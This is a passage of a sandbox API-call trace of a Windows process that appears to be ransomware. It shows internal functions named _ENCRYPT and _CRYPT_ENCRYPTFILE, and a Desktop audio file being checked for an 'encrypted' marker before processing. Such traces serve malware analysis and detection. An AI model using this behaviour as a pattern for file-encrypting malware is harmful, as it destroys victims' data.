returned 1 [0029.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0029.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0029.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0029.736] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0029.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0029.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0029.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0029.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0029.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0029.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0029.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0029.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0029.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0029.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0029.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0029.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0029.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0029.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0029.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0029.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0029.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0029.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0029.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0029.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0029.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0029.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0029.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0029.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0029.737] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0029.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0029.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0029.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0029.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0029.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0029.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0029.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0029.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0029.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0029.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0029.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0029.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0029.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0029.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0029.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0029.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0029.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0029.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0029.738] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0029.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0029.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0029.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889af0 [0029.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889af0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0029.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0029.738] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0029.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0029.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0029.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0029.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0029.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0029.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0029.738] CloseHandle (hObject=0x128) returned 1 [0029.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0029.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0029.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0029.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0029.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0029.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0029.739] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0029.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0029.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0029.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0029.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0029.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0029.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0029.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0029.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0029.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0029.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0029.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0029.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0029.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0029.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0029.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0029.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0029.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0029.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0029.739] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0029.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0029.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0029.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0029.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0029.739] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0029.739] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0029.739] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.739] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0029.739] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0029.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0029.740] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.740] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.740] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.740] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea155690, ftCreationTime.dwHighDateTime=0x1d5bf55, ftLastAccessTime.dwLowDateTime=0x647f3060, ftLastAccessTime.dwHighDateTime=0x1d5babd, ftLastWriteTime.dwLowDateTime=0x647f3060, ftLastWriteTime.dwHighDateTime=0x1d5babd, nFileSizeHigh=0x0, nFileSizeLow=0x64b5, dwReserved0=0x0, dwReserved1=0x777648, cFileName="aOaIGEPyFbLNzs8iTQgh.m4a", cAlternateFileName="AOAIGE~1.M4A")) returned 0x7c20c0 [0029.740] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0029.740] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.740] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea155690, ftCreationTime.dwHighDateTime=0x1d5bf55, ftLastAccessTime.dwLowDateTime=0x647f3060, ftLastAccessTime.dwHighDateTime=0x1d5babd, ftLastWriteTime.dwLowDateTime=0x647f3060, ftLastWriteTime.dwHighDateTime=0x1d5babd, nFileSizeHigh=0x0, nFileSizeLow=0x64b5, dwReserved0=0x0, dwReserved1=0x777648, cFileName="aOaIGEPyFbLNzs8iTQgh.m4a", cAlternateFileName="AOAIGE~1.M4A")) returned 0x7c20c0 [0029.741] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0029.741] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\aOaIGEPyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\aOaIGEPyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\aOaIGEPyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\aOaIGEPyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\aOaIGEPyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\aOaIGEPyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\aOaIGEPyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aOaIGEPyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OaIGEPyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aIGEPyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IGEPyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GEPyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EPyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PyFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yFbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FbLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bLNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Nzs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zs8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iTQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TQgh.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.742] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.742] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0029.742] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0029.742] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0029.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0029.743] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0029.743] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0029.743] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0029.743] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0029.743] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.743] FindFirstFileW (in: 